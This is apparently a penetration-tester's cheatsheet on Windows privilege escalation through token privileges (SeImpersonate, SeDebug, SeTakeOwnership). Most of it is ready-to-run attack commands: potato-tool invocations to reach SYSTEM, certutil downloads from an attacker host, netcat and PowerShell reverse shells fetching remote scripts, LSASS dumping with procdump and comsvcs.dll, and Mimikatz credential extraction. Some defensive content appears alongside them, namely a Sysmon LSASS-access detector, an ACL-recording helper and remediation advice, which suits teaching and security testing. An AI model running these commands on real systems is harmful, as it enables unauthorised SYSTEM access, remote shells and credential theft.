πŸ›‘οΈ Methodology Checklist

  • Check privileges: whoami /priv
  • SeImpersonatePrivilege β†’ OS build ≀1809: JuicyPotato; β‰₯1809: PrintSpoofer
  • SeDebugPrivilege β†’ LSASS dump via procdump or comsvcs.dll
  • SeTakeOwnershipPrivilege β†’ takeown /f [file] then icacls [file] /grant [USER]:F
  • SeBackupPrivilege β†’ backup SAM/SYSTEM or NTDS via diskshadow
  • SeAssignPrimaryToken β†’ PrintSpoofer or GodPotato
  • PPID spoofing with psgetsystem if needed for stealth

🎯 Operational Context

Use when: whoami /priv lists SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. Use a potato-class tool (PrintSpoofer, RoguePotato, GodPotato) to reach SYSTEM. Think dumber first: if SeImpersonatePrivilege is listed, run PrintSpoofer64.exe -i -c cmd straight away; this turns IIS or MSSQL service-account access into SYSTEM in one command. The State column matters less than it looks: "Disabled" only means the privilege is not currently enabled in the token, and every potato tool enables it itself via AdjustTokenPrivileges before impersonating. Skip when: the privilege is absent from the list altogether. A privilege that is not in the token cannot be added to it, so look for another escalation path.

⚡ Tactical Cheatsheet

Command | Tactical Outcome
whoami /priv | Confirm which token privileges are present (Disabled is fine; absent is not)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c [CMD]" -t * | SeImpersonate → SYSTEM on build < 1809 (Server 2016, Win10 ≤ 1803)
.\PrintSpoofer.exe -c "cmd.exe /c [CMD]" | SeImpersonate → SYSTEM on build ≥ 1809 (Server 2019+, Win10 1809+); needs the Print Spooler service running
.\PrintSpoofer.exe -i -c powershell.exe | Interactive SYSTEM PowerShell via PrintSpoofer
.\RoguePotato.exe -r [LHOST] -e "cmd.exe /c [CMD]" -l 9999 | SeImpersonate → SYSTEM without the Spooler; needs an attacker-side redirector from [LHOST]:135 to the -l port
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp | SeDebugPrivilege → dump LSASS to file
sekurlsa::minidump lsass.dmp | Load the LSASS dump in Mimikatz
sekurlsa::logonpasswords | Extract credentials from the loaded dump
. .\psgetsystem.ps1; Get-System | PPID spoofing to spawn a SYSTEM process (SeDebugPrivilege); dot-source the script, and check which function name the version you have defines before calling it
.\EnableAllTokenPrivs.ps1 | Enable every privilege present in the token, including SeTakeOwnership
takeown /f C:\[PROTECTED_FILE] | SeTakeOwnership → take file ownership
icacls C:\[PROTECTED_FILE] /grant [USER]:F | Grant yourself full control after takeown
type C:\[PROTECTED_FILE] | Read the previously protected file (fails with a sharing violation if the file is held open, e.g. live registry hives)

🔬 Deep Dive & Workflow

SeImpersonatePrivilege: OS Build Decision Tree

Check build: systeminfo | findstr "OS Version"   (the five-digit build is what matters: 14393 = Server 2016, 17134 = 1803, 17763 = 1809 / Server 2019)

Build < 1809, i.e. below 17763 (Server 2016, Win10 ≤ 1803):
  → JuicyPotato.exe
  → Must select a CLSID valid for the exact OS version
  → https://github.com/ohpe/juicy-potato/tree/master/CLSID

Build ≥ 1809 / 17763 (Server 2019+, Win10 1809+): JuicyPotato no longer works here
  → PrintSpoofer.exe (named pipe impersonation via the Print Spooler; the Spooler service must be running)
  → or RoguePotato (DCOM + OXID resolver; the target must reach your redirector on TCP 135)
  → or GodPotato (DCOM/RPCSS abuse, no Spooler and no network needed; ships as NET2, NET35 and NET4 builds, works from Windows 8 / Server 2012 through Windows 11 / Server 2022)

Common trigger context:
  → IIS application pool identity (IIS AppPool\DefaultAppPool) → has SeImpersonate
  → MSSQL service account → xp_cmdshell → whoami /priv
  → Any Windows service account (LOCAL SERVICE, NETWORK SERVICE, virtual accounts) holds SeImpersonate by default

JuicyPotato Execution

# Transfer JuicyPotato and nc.exe (certutil will not create the target directory)
mkdir C:\tools
certutil -urlcache -split -f http://[LHOST]/JuicyPotato.exe C:\tools\jp.exe
certutil -urlcache -split -f http://[LHOST]/nc.exe C:\tools\nc.exe
 
# Reverse shell via JuicyPotato
# -l is the local COM listener port (any free port); -t * tries both CreateProcessWithTokenW and CreateProcessAsUser
C:\tools\jp.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\tools\nc.exe [LHOST] [LPORT] -e cmd.exe" -t *
 
# If the default CLSID fails, pass one valid for the OS version (see the CLSID folder in the repo):
# Server 2016 (BITS): {4991D34B-80A1-4291-83B6-3328366B9097}
C:\tools\jp.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\tools\nc.exe [LHOST] [LPORT] -e cmd.exe" -t * -c {4991D34B-80A1-4291-83B6-3328366B9097}

PrintSpoofer Execution

# Interactive shell
.\PrintSpoofer.exe -i -c "cmd.exe"
 
# Reverse shell
.\PrintSpoofer.exe -c "nc.exe [LHOST] [LPORT] -e cmd.exe"
 
# PowerShell reverse shell
.\PrintSpoofer.exe -c "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1')"

SeDebugPrivilege: LSASS Dump → Credentials

# Pre-check: if LSASS runs as a protected process (RunAsPPL = 1) every user-mode method below returns access denied,
# and with Credential Guard enabled the dump contains no usable secrets. Check before making noise:
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL

# Method 1: ProcDump (signed MS tool; still blocked by the Defender ASR rule "Block credential stealing from LSASS" where it is enabled)
.\procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
 
# Method 2: Task Manager (GUI): right-click lsass.exe → Create dump file
 
# Method 3: PowerShell + MiniDumpWriteDump
# (various PoCs: Out-Minidump, Invoke-Mimikatz; expect AMSI/Defender hits on the stock versions)
 
# Method 4: comsvcs.dll (LOLBin already on the system). Run it from PowerShell, not cmd.exe:
# SeDebugPrivilege must be Enabled in the calling token and rundll32 inherits that token. .NET enables the
# privilege the first time the Process class is used (Get-Process below), whereas cmd.exe leaves it Disabled
# and the dump silently fails.
$p = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $p C:\temp\lsass.dmp full
 
# Transfer the dump to the attacker and analyze offline with Mimikatz:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
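Every method above opens a handle to lsass.exe with read and query access, which is exactly what Sysmon Event ID 10 (ProcessAccess) records, together with the requested access mask and the call stack. The following PowerShell is an added example of that detection logic, not code from the original page; the sample events are constructed for the demo (the +0 offsets are placeholders, not real stack data) and the allow-list is an assumption that has to be tuned per estate.

```powershell
# Added example: flag handles opened to lsass.exe that look like a credential dump.
# Input shape mirrors Sysmon Event ID 10 EventData fields; the events below are made up.

$LsassAccessAllowList = @(           # assumption: images expected to touch lsass.exe on a healthy host
    'C:\Windows\System32\svchost.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\csrss.exe',
    'C:\Program Files\Windows Defender\MsMpEng.exe'
)

function Test-LsassAccessEvent {
    param([Parameter(Mandatory)] $Event)   # object with SourceImage, TargetImage, GrantedAccess, CallTrace

    if ($Event.TargetImage -notmatch '\\lsass\.exe$') { return $null }

    $mask = [Convert]::ToInt32($Event.GrantedAccess, 16)   # accepts the "0x" prefix Sysmon writes
    # A dump needs PROCESS_VM_READ (0x10) plus PROCESS_QUERY_INFORMATION (0x400) or
    # PROCESS_QUERY_LIMITED_INFORMATION (0x1000); PROCESS_ALL_ACCESS (0x1FFFFF) covers both.
    $canRead  = ($mask -band 0x10) -ne 0
    $canQuery = ($mask -band 0x400) -ne 0 -or ($mask -band 0x1000) -ne 0
    if (-not ($canRead -and $canQuery)) { return $null }

    if ($LsassAccessAllowList -contains $Event.SourceImage) { return $null }

    # MiniDumpWriteDump is exported by dbghelp.dll / dbgcore.dll; comsvcs.dll in the stack is the LOLBin path.
    $severity = 'medium'
    if ($Event.CallTrace -match 'dbghelp\.dll|dbgcore\.dll|comsvcs\.dll') { $severity = 'high' }

    [pscustomobject]@{
        Severity      = $severity
        SourceImage   = $Event.SourceImage
        GrantedAccess = ('0x{0:X}' -f $mask)
        Reason        = 'non-allow-listed image opened lsass.exe with read+query access'
    }
}

# Constructed sample events (not real telemetry): one benign, one procdump, one comsvcs via rundll32.
$SampleEvents = @(
    [pscustomobject]@{ SourceImage='C:\Windows\System32\svchost.exe';  TargetImage='C:\Windows\system32\lsass.exe'; GrantedAccess='0x1400';   CallTrace='C:\Windows\SYSTEM32\ntdll.dll+0|C:\Windows\System32\KERNELBASE.dll+0' }
    [pscustomobject]@{ SourceImage='C:\temp\procdump.exe';             TargetImage='C:\Windows\system32\lsass.exe'; GrantedAccess='0x1FFFFF'; CallTrace='C:\Windows\SYSTEM32\ntdll.dll+0|C:\Windows\System32\KERNELBASE.dll+0|C:\temp\dbgcore.dll+0|C:\temp\procdump.exe+0' }
    [pscustomobject]@{ SourceImage='C:\Windows\System32\rundll32.exe'; TargetImage='C:\Windows\system32\lsass.exe'; GrantedAccess='0x1FFFFF'; CallTrace='C:\Windows\SYSTEM32\ntdll.dll+0|C:\Windows\System32\KERNELBASE.dll+0|C:\Windows\System32\comsvcs.dll+0' }
)

# The svchost event is dropped (no VM_READ bit and allow-listed); the other two come back as high severity.
$SampleEvents | ForEach-Object { Test-LsassAccessEvent $_ } | Format-Table -AutoSize
```

To run it against real telemetry, feed objects built from Get-WinEvent on Microsoft-Windows-Sysmon/Operational filtered to EventID 10 instead of the constructed array; the allow-list is where the tuning effort goes, and an unsigned or user-writable SourceImage path is the next thing to check, since the event alone cannot tell you that.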

PPID Spoofing with psgetsystem

# SeDebugPrivilege lets you open any process, including SYSTEM ones, with PROCESS_CREATE_PROCESS.
# That handle is passed as PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, so the new child inherits the parent's SYSTEM token.
Import-Module .\psgetsystem.ps1
Get-System
# → Spawns cmd.exe as SYSTEM with a SYSTEM process (e.g. winlogon.exe) as its parent
# (the exported function name differs between versions of the script; check what it defines before calling it)
 
# Verify:
whoami   # → nt authority\system

SeTakeOwnershipPrivilege: Protected File Access

# Enable the privilege if takeown reports access denied (it may be listed but Disabled)
.\EnableAllTokenPrivs.ps1
 
# Typical targets: other users' files, service binaries and config files holding credentials (web.config, unattend.xml),
# or registry keys. Example: another user's file
takeown /f "C:\Users\Administrator\Desktop\secret.txt"
icacls "C:\Users\Administrator\Desktop\secret.txt" /grant [CURRENT_USER]:F
type "C:\Users\Administrator\Desktop\secret.txt"
 
# Caveat: the live SAM/SYSTEM hives and NTDS.dit are held open exclusively by the kernel. Ownership and ACL
# changes on them succeed (they need no read/write sharing), but the copy fails with a sharing violation, and
# rewriting the ACL on a hive is loud and can leave the box unbootable. Get the hives from a shadow copy
# (vssadmin/diskshadow, needs admin) or with SeBackupPrivilege (reg save HKLM\SAM), not through takeown.
takeown /f C:\Windows\System32\config\SAM                 # succeeds
icacls C:\Windows\System32\config\SAM /grant [USER]:F     # succeeds
copy C:\Windows\System32\config\SAM C:\temp\              # fails: the file is in use by another process
copy C:\Windows\System32\config\SYSTEM C:\temp\           # same
# With copies obtained another way → impacket-secretsdump -sam SAM -system SYSTEM LOCAL
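The takeown/icacls sequence above changes state the client will have to undo, and it cannot tell a locked file from a permission problem. The following PowerShell is an added example, not code from the original page: it records the original owner and DACL before touching anything, performs the two steps, and then probes the file so the sharing-violation case (live hives, NTDS.dit) is reported for what it is. The function name and the backup directory are mine.

```powershell
# Added example: takeown + icacls with an ACL record and a locked-file probe.

function Take-FileAccess {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string] $AclBackupDir = "$env:TEMP\acl-backup"    # assumption: a writable scratch directory
    )
    if (-not (Test-Path -LiteralPath $Path)) { throw "No such file: $Path" }
    New-Item -ItemType Directory -Path $AclBackupDir -Force | Out-Null

    # 1. Record the original security descriptor (SDDL carries owner and DACL) for the restore notes.
    #    Reading it may itself be denied before we own the file; that is recorded rather than fatal.
    #    Putting a different owner back later needs SeRestorePrivilege, so hand this to the client.
    $before = $null
    try { $before = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { }
    $backup = Join-Path $AclBackupDir (([IO.Path]::GetFileName($Path)) + '.sddl')
    if ($before) { $before.Sddl | Set-Content -LiteralPath $backup }
    else { 'original descriptor not readable before takeown' | Set-Content -LiteralPath $backup }

    # 2. takeown enables SeTakeOwnershipPrivilege itself; if it still fails, run EnableAllTokenPrivs.ps1 first.
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    & takeown.exe /F $Path | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "takeown failed (exit $LASTEXITCODE): privilege missing or disabled?" }
    & icacls.exe $Path /grant "${me}:F" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "icacls failed (exit $LASTEXITCODE)" }

    # 3. Probe. ERROR_SHARING_VIOLATION (HRESULT 0x80070020) means the kernel holds the file open
    #    exclusively, as it does for registry hives and NTDS.dit: owning the file does not help.
    $state = 'readable'
    try {
        $fs = [System.IO.File]::Open($Path, [IO.FileMode]::Open, [IO.FileAccess]::Read, [IO.FileShare]::ReadWrite)
        $fs.Close()
    } catch [System.IO.IOException] {
        if ($_.Exception.HResult -eq -2147024864) {
            $state = 'locked by another process (take it from a shadow copy or with reg save instead)'
        } else { throw }
    }

    [pscustomobject]@{
        Path          = $Path
        OriginalOwner = if ($before) { $before.Owner } else { 'unknown (see AclBackup)' }
        NewOwner      = (Get-Acl -LiteralPath $Path).Owner
        AclBackup     = $backup
        State         = $state
    }
}

# Usage: a protected file nobody holds open comes back as readable
# Take-FileAccess -Path 'C:\Users\Administrator\Desktop\secret.txt'
# Usage: the live SAM hive comes back as locked (demonstration only; avoid on production systems)
# Take-FileAccess -Path 'C:\Windows\System32\config\SAM'
```

The .sddl file written per target is what the restore step after the engagement works from; the DACL part can be put back by the client with icacls, while resetting the owner to its original (often NT SERVICE\TrustedInstaller) requires SeRestorePrivilege, which is why the script records rather than attempts it.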

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
PrintSpoofer failsWindows Server 2019+ with Print Spooler disabledTry GodPotato instead: works on all Windows 10/2016/2019/2022
RoguePotato failsNetwork not accessible for OXID resolutionPrintSpoofer or GodPotato don’t require network; use them instead
GodPotato returns errorWrong .NET version on targetGodPotato requires .NET 4.0+; check: dir C:\Windows\Microsoft.NET\Framework64\
Potato exploit runs but returns error 5SeImpersonatePrivilege not enabledEnable: whoami /priv check; some tokens need activation via PowerShell token manipulation
SweetPotato failsWindows Defender detectingUse GodPotato or PrintSpoofer β€” less detected; or compile from source with modified strings

πŸ“ Reporting Trigger

Finding Title: SeImpersonatePrivilege Exploited for SYSTEM Privilege Escalation Impact: Service accounts with SeImpersonatePrivilege (IIS, MSSQL, etc.) are exploitable via potato-class attacks to impersonate the SYSTEM token, escalating from service account to full SYSTEM access without additional vulnerability exploitation. Root Cause: IIS application pool or SQL Server service running with SeImpersonatePrivilege (granted by default to service accounts). Modern Windows token isolation not preventing potato exploit class. Recommendation: Run IIS and SQL Server service accounts without SeImpersonatePrivilege where possible. Apply Windows patches for PrintSpoofer CVEs. Consider Windows Defender Application Control (WDAC) to block potato exploit binaries. Monitor for SYSTEM token impersonation attempts via EDR.